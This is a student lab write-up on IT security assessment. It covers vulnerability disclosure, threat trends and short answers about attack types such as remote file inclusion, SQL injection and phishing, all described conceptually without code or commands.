Lab 4: Aligning an IT Security Assessment
Vulnerability Life Cycle
· Death is the culmination of this vulnerability cycle. When the number of systems vulnerable to an exploit is reduced to an insignificant amount then this stage occurs. It can happen by patching vulnerable systems, retiring old systems, or lack of interest in the exploit by hackers.
Types of Disclosure
· The types of disclosure are listed below
· This policy would mean to keep the information tightly contained so as the general public never learns of its existence.
· This would mean that the information about system vulnerabilities and attack tools would be revealed as possible so that potential victims are as knowledgeable as those who attack them.
· The main concept behind limited disclosure is that vulnerability information is shared as few individuals as possible.
· During this stage of the vulnerability life cycle the method of discovery will determine how responsible disclosure will proceed. Initial contact signals the start of the disclosure stage.
Existing Policies and Proposals
· NTBug Traq Disclosure policy
· Rain Forest Puppy “RF Policy”
· IETF draft
· The Fisher Plan
Threat Activity Trends
· Organizations should monitor all network- connected computers for signs of malicious activity including bot activity and potential security breaches, ensuring that any infected computers are removed from the network and disinfected as soon as possible.
· Web browser vulnerabilities are a serious security concern due to their role in online fraud and in the propagation of malicious code, spyware, and adware.
Malicious Code trends
· Monitoring trends in the number of new malicious threats can help improve awareness of their danger and underscores the importance of maintaining robust security, including up-to-date antivirus signatures and software patches.
Phishing, Underground Economy Servers, Spam Trends
· Symantec recommends that enterprise users protect themselves against phishing threats by filtering email at the server level through the mail transfer agent. Organizations can also use IP-based filtering upstream as well as HTTP filtering.
There is a long list of reasons why you want to do periodic assessments and an equally long list of why you shouldn’t. An increasing number of organizations are bound by governmental regulations that dictate what security measures you should have in place and how they should be audited. You get to find out whether your security has already been compromised. You might not know unless you look, and you will sleep better at night if you know.
Lab Assessment Questions and Answers
1. What is a PHP Remote File Include attack and why are these prevalent in today’s Internet world? An inclusion attack wherein an attacker can cause the web application to include a remote file by exploiting a web app that dynamically includes external files or scripts.
2. What country is the top of Structured Query Language injection and SQL Slammer infections?TheU.S. Why can’t the U.S. government do anything to prevent these injection attacks and infections? Cybercriminals have made vast improvements to their infrastructure over the last few years. Its expansion is thousands of websites vulnerable to SQL injections.
3. What does it mean to have a policy of nondisclosure in an organization?It is a contract where the parties agree not disclose information covered by the agreement.
4. What trends were tracked when it came to malicious code in 2009 by the Symantec Report researched during this lab?DOS attacks are always common however targeted attacks using advanced persistent threats that occurred in 2009 made headlines.
5. What is phishing? Describe what a typical phishing attack attempts to accomplish. Phishing is a term used to describe various scams that use fraudulent email messages sent by criminal to trick you into divulging personal information.
6. What is the Zero Day Initiative? A program for rewarding security researchers for responsibly disclosing vulnerabilities. Do you think this is valuable and would you participate if you were the managing partner in a large firm? It is valuable for firms in that vulnerabilities are shared so that they can be mitigated before more harm can be done.
7. What is a Server Side Include? What are the ramifications if an SSI exploit is successful? The Server Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields.
8. According to the TippingPoint Report researched in the lab, how do Server Message Block attacks measure up to Hypertext Transfer Protocol attacks in the recent past? In contrast to HTTP attacks, attacks against the SMB protocol, which is the foundation of countless file shares, has dropped over the sampled time period.
9. According to the TippingPoint Report what are some of the PHP RFI payload effects DVLabs has detected? Password brute force, E-mail/MMS Spam relay, Network flood, Malware dropper, Botnet member, Recon and re-infection.
10. Explain the steps it takes to execute a malicious PDF attack as described in the TippingPoint report. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
11. What is a Zero Day attack and how does this relate to an organization’s vulnerability window? It’s an attack that exploits a previously unknown vulnerability in a computer application, one that developers have not had time to address and patch.
12. How can you mitigate the risk from users and employees clicking on an embedded URL link or email attachment from unknown sources? Continue with the controls that the government organization already has in place to combat malicious e-mail. Connect to the Internet via a Trusted Internet Connection. Take measures to protect the actual PCs used by users.
13. When auditing an organization for compliance, what role do IT security policies and an IT security policy framework play in the compliance audit? Since IT systems are used to generate, change, house, and transport that data IT personnel have to build the controls that ensure the information stands up to audit scrutiny.
14. When performing a security assessment why is it a good idea to examine compliance in separate compartments such as the seven domains of a typical IT infrastructure? Each domain has different degrees of risk that require different mitigation solutions. Each domain will have different standards to meet compliance requirements.
15. True or False: Auditing for compliance and performing security assessments to achieve compliance require a checklist of compliance requirements. True.